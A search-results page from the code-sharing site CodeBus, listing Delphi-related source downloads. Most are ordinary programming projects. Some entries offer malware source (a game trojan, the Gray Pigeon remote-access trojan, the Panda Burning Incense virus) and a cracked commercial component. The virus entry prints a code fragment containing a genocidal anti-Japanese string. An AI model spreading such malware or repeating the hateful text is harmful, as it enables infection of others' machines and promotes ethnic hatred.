Welcome![Sign In][Sign Up]
Location:
Search - delphi r

Search list

[File Formatli

Description: 本设计针对信息处理能力在现在化工厂中的重要作用,且作为工厂的生产基地——工厂也必须适应这一变化趋势的要求,也就是说工厂的建设、管理应该向着信息化、智能化、系统化、规范化和自动化的方向发展,基于这种社会发展的趋势,加之工厂个部门之间的本身的管理效率过低,工人与工厂管理者之间沟通差,商品发货和运输等问题的出现,使我了解到大部分工厂目前存在的隐患,那就是需要一个良好的管理系统来对整个工厂的动作实现信息化和智能化的管理。本设计通过需求分析、概要设计、逻辑设计、物理设计等几个阶段通过工厂各个实体之间的联系进行设计,并通过E-R图让使用者更加深切理解本程序内实体之间的关系,使之能更加快速的查询、删除和更改所建数据库的内容。并加入了备份和恢复策略部分,使内容更加完善-delphi
Platform: | Size: 401408 | Author: 李伟 | Hits:

[Game Enginesfeee

Description: 飘逸引擎使用说明书 高手新手 一书在手-Elegant engine, manual master novice a book in hand
Platform: | Size: 1049600 | Author: 蒋庆 | Hits:

[Parallel PortLPT

Description: 并口调试软件,可更改并口地址,可以手动输入,但必须加上0X,否则认为是错误地址-Parallel debugging software, change the parallel port address, you can manually input, but it must be coupled with 0X, otherwise considered to be the wrong address
Platform: | Size: 1526784 | Author: wei | Hits:

[Delphi VCLWEBCOPY

Description: 通过WEB 复制文件的DELPHI 控件-TMS.WEBCOPY.1.6.DelphiRetail-SKYDANCER Supplier : Team SKYDANCER Rlz date : 01/10/2006 Packager : Team SKYDANCER Archives : 01x0.5mb Cracker : non Protec. : non TWebCopy uses the Wininet API to load the selected files via http or ftp from Intranet or Internet sites or can copy files by UNC name over the network. It features a progress/cancel dialog and threaded execution. (ASP script available to handle POST based HTTP uploads) WebCopy can be configured to retrieve automatically only newer files w.r.t. to a configurable date. Files to copy over the web can be easily set at design time using a Items collection or programmatically : HTTP: with WebCopy.Items.Add do begin URL := http://www.tmssoftware.com/webcopy.zip Protocol := wpHTTP FileDate := EncodeDate(2002,3,18) CopyNewerOnly := true TargetDir := c:\temp end FTP: with WebCopy.Items.Add do begin FTPHost := ftp.tms
Platform: | Size: 27648 | Author: newsun | Hits:

[Com PortDemo_Delphi

Description: modbus_rtu.dll V3.0完美版串口通讯控件应用例程,-modbus Rtu DLL Demo
Platform: | Size: 382976 | Author: 王俊 | Hits:

[Game Hook CrackDNF

Description: DNF木马源代码最新可以用的DNF木马2010年6月份更新的现在可以使用-DNF Trojan source code can be used DNF latest Trojan in June 2010 update is now available
Platform: | Size: 1149952 | Author: xiaoxiao | Hits:

[Remote ControlUlock

Description: 很经典的一个远控源码,灰鸽子2007vip 的源码,值得学习-Classic source of a remote control, gray pigeons 2007vip the source, it is worth learning
Platform: | Size: 275456 | Author: 刘瑞 | Hits:

[Delphi VCLkkk

Description: 基于决策支持系统的 DELPHI编程的小结-unit Unit3 interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, Menus, DB, ADODB, jpeg, ExtCtrls type TForm3 = class(TForm) MainMenu1: TMainMenu N1: TMenuItem Exel1: TMenuItem N3: TMenuItem N4: TMenuItem ADOConExcel: TADOConnection ADOQryExcel: TADOQuery DataSource1: TDataSource Image1: TImage procedure N3Click(Sender: TObject) procedure N1Click(Sender: TObject) procedure Exel1Click(Sender: TObject) procedure N2Click(Sender: TObject) private { Private declarations } public { Public declarations } end var Form3: TForm3 implementation uses Unit1, Unit4, Unit6, Unit5 {$R*.dfm} procedure TForm3.N3Click(Sender: TObject) begin form1.ShowModal end procedure TForm3.N1Click(Sender: TObject) begin form4.ShowModal end procedure TForm3.Exel1Click(Sender: TObject) begin try //查询Excel 表1 的数据
Platform: | Size: 3372032 | Author: 张三 | Hits:

[OS programModGetHID

Description: 生成与硬件相关的注册码。控制软件不重复使用!那么,很多多人认为VB实现不了。自然没有找到方法,一定是实现不了。然而,感谢WWW,我们能在上面找到VC的源码,DELPHI的源码。但是VB的就是见不到。为此,我决定将VC的源码改成VB的,以下即是: VC原作说明部分(再发行时,请注意采用注解的方式,请不要删除的方式侵权,谢谢!) ************************************************************************* 通常情况下,我们通过=&HEC命令对IDE端口进行监测.获取硬盘信息. 一般情况下,我们就写个VXD或者DRIVER来完成.但是现在,通过MS的S.M.A.R.T.接口, 我们可以直接从RING3调用API DeviceIoControl()来获取硬盘信息.下面乃是我的例程: 另外,也有编译好的版本供大家平时使用.欢迎下载.-Generate the registration code and hardware-related. The control software is not re-use! So, a lot of people believe that VB can achieve. Naturally not found a way, it must be impossible to achieve. However, I would like to thank the WWW, in the above we can find the source of VC, DELPHI source code. But VB is not see. To this end, I decided to change the source of VC to VB, that is: ' VC original description of the part (re-issue, please note the use of comment, please do not delete infringement, thank you!)' ************************************************************************************************************** ' is usually the case, the IDE port = & of HEC command to monitor access to hard information' under normal circumstances, we write a VXD or DRIVER to complete. But now, through the SMART interface of the MS, ' We can be called from RING3 API DeviceIoControl () to obtain hard information below, but my routine:' In addition, the compiled version for
Platform: | Size: 5120 | Author: | Hits:

[Audio programSound

Description: there is a source of library with delphi. it s about of w/r sound with delphi.
Platform: | Size: 175104 | Author: mohammad | Hits:

[OS programvirus

Description: 熊猫烧香原代码 熊猫烧香, 十六进制, Windows, 源代码, 字符串 熊猫烧香源代码 program Japussy uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry} const HeaderSize = 82432 //病毒体的大小 IconOffset = EB8 //PE文件主图标的偏移量 //在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同 //查找2800000020的十六进制字符串可以找到主图标的偏移量 { HeaderSize = 38912 //Upx压缩过病毒体的大小 IconOffset = BC //Upx压缩过PE文件主图标的偏移量 //Upx 1.24W 用法: upx -9 --8086 Japussy.exe } IconSize = E8 //PE文件主图标的大小--744字节 IconTail = IconOffset + IconSize //PE文件主图标的尾部 ID = 444444 //感染标记 //垃圾码,以备写入 Catchword = If a race need to be killed out, it must be Yamato. + If a country need to be destroyed, it must be Japan! + *** {$R *.RES} function : Integer): Integer-Panda original code Panda burning incense, hexadecimal, Windows source code, string the panda source code program Japussy uses Windows, the SysUtils the Classes, Graphics, ShellAPI {, Registry} const HeaderSize = 82 432 // virions the the size of IconOffset = EB8 // PE file main icon offset// in the above compile my Delphi5 SP1 size, other versions of Delphi may be different// Find 2800000020 hexadecimal string can be found in the main icon the offset {HeaderSize = 38912 // Upx compression over the the virus body size IconOffset = BC // Upx compressed PE file offset of the main icons the// Upx 1.24W Usage: upx-9- 8086 Japussy. exe} IconSize = E8 // PE file main icon size the- 744 the byte IconTail = IconOffset+ IconSize // tail of the PE file main icon ID = 444 444 // infection markers// junk yard to prepare written Catchword = ' If a race need to be killed out, it must be Yamato.' +' If a country need to be destroyed, it must be Japan! ' +' *** {$ R*. RES} function:
Platform: | Size: 4096 | Author: 炎热 | Hits:

[Delphi VCLchannel

Description: Delphi写的控制左右声道的小程序。立体声的播放设备中,L、R声道是分开独立的,两声道的音乐也是不一样的,这样人听起来才会有现场感,也就是立体声效果。-Small program written in Delphi to control the left and right channels. Stereo playback devices, L, R channel is separate, two-channel music is not the same, so that people will have a sense of the scene sounds, that is, the stereo effect.
Platform: | Size: 10240 | Author: id55511 | Hits:

[Windows DevelopDelphi_845716

Description: Delphi数组例子,Delphi使用回溯法找出n个自然数中取r个数的不同位组合,你可以指定自然数和数组元素,然后点击“分组”按钮,即可看到分组效果。 -Delphi array of examples, Delphi use backtracking to find different bit combinations of n natural numbers taken r number, you can specify the number and nature of array elements, and then click on the "grouping" button to see the grouping effect.
Platform: | Size: 7168 | Author: L5GHTR2 | Hits:

[Delphi VCLDelphiregencrypt

Description: Delphi随机生成程序序列号,程序通过MS的S.M.A.R.T.接口,直接从RING3调用API DeviceIoControl()来获取硬盘信息Get SCSI port handle,演示源码中还包括了应用此序列号的注册程序,输入序列号正确后,则将已安装信息写入注册表,main文件夹中的注册序列号判断程序需要在任务管理器退出。-Delphi random sequence number, the program through the S.M.A.R.T. interface of MS, directly from the RING3 call API DeviceIoControl () to access the hard disk information Get SCSI port handle, demo source code also includes the application of the serial number of the registration process, the input sequence number is correct, it will be installed in the main folder information written to the registry, the registry sequence number judgment procedures need to exit in the task manager.
Platform: | Size: 17408 | Author: gpudn67 | Hits:

[Delphi VCLgetfontlist

Description: Delphi枚举可用字体,也就是列出windows系统中所有安装的字体名称,向组合框中添加系统中已经安装的字体名称,若选中字体后,可改变R i c h E d i t组件中文字的字体。-The Delphi enumeration of fonts, also is the list of all installed fonts name windows system, add the font name is already installed in the system to the combo box, if the selected font, can change the R I c h E d i t text components in the font.
Platform: | Size: 5120 | Author: wpudn45 | Hits:

[Delphi VCLdelphihuisu

Description: Delphi数组例子,Delphi使用回溯法找出n个自然数中取r个数的不同位组合,你可以指定自然数和数组元素,然后点击“分组”按钮,即可看到分组效果。-An array of Delphi example, Delphi use backtracking to find different combinations of R number n of the natural numbers, you can specify the nature and number of array elements, and then click the "block" button, you can see the grouping effect.
Platform: | Size: 7168 | Author: wpudn50 | Hits:

[Delphi VCLRGB

Description: Delphi:RGB亮度调节,Delphi实现图像RGB亮度调节,像PhotoShop那样调整图像的亮度。对每个象素点的R、G、B分量进行调节,不能越界,限制在0~255。 -Delphi: RGB brightness adjustment, Delphi realize RGB image brightness adjustment, so adjust the brightness of the image like PhotoShop. For each pixel of R, G, B component of adjustment, not out of range, limited to 0 to 255.
Platform: | Size: 6144 | Author: P6QIR1W | Hits:

[Delphi VCLerweima-print

Description: 基于Delphi的二维码生成及其打印,直接载入Excel表格,直接生成二维码,直接打印。-请键入文字或网站地址,或者上传文档。 取消 Jīyú Delphi de èr wéi mǎ shēngchéng jí qí dǎyìn, zhíjiē zài rù Excel biǎogé, zhíjiē shēngchéng èr wéi mǎ, zhíjiē dǎyìnDelphi-based two-dimensional code generation and printing, direct load Excel spreadsheet directly generate two-dimensional code, Direct Print
Platform: | Size: 813056 | Author: mike | Hits:

[Delphi VCLDPF.Android.Native.Components.v2.8.6

Description: 该控件Delphi XE开发原生的 Android 应用程序。组件:TDPFJAlertDialog, TDPFJAnalogClock, TDPFJButton, TDPFJCheckBox ,TDPFJChronometer, TDPFJDatePicker 等等。封装了包括 Android.Widget, Android.Net, Android.OS and Android-Develop Native Android applications with Delphi XE5/XE6/XE7 Some components: + Added TDPFJAlertDialog + TDPFJAnalogClock + TDPFJButton + TDPFJCheckBox + TDPFJChronometer + TDPFJDatePicker + TDPFJDatePickerDialog + TDPFJEditText + TDPFJImageView + TDPFJListView (not completed) + TDPFJProgressBar + TDPFJProgressDialog + TDPFJTextView + TDPFJTimePickerDialog + TDPFJToast + TDPFJView + TDPFJRadioButton + TDPFJNumberPicker + TDPFJScrollView component + TDPFJSeekBar + TDPFJTabHost Component (Tabbed view) + TDPFJSpinner Component (Dropdown list) + TDPFJTextSwitcher Component (Fade/Slide Texts) + TDPFJTextClock + TDPFJWebView + Wrapped some Android.Widget + Wrapped some Android.Net + Wrapped some Android.OS + Wrapped some Android.R Enjoy Android Native Apps Developing Babak Yaghoobi
Platform: | Size: 2789376 | Author: 刘涌 | Hits:

[Go语言编程

Description: 编程语言已经非常多,偏性能敏感的编译型语言有 C、C++、Java、C#、Delphi和Objective-C 等,偏快速业务开发的动态解析型语言有PHP、Python、Perl、Ruby、JavaScript和Lua等,面向特 定领域的语言有Erlang、R和MATLAB等,那么我们为什么需要 Go这样一门新语言呢?(There are a lot of programming languages. The compiled languages with biased performance are C, C++, Java, C#, Delphi and Objective-C. The dynamic parsing languages such as PHP, Python, Perl, Ruby, JavaScript and Lua, etc., are for special purpose. There are Erlang, R and MATLAB in the domain language. Then why do we need such a new language such as Go?)
Platform: | Size: 8692736 | Author: QDQD | Hits:
« 1 2 ... 5 6 7 8 9 10»

CodeBus www.codebus.net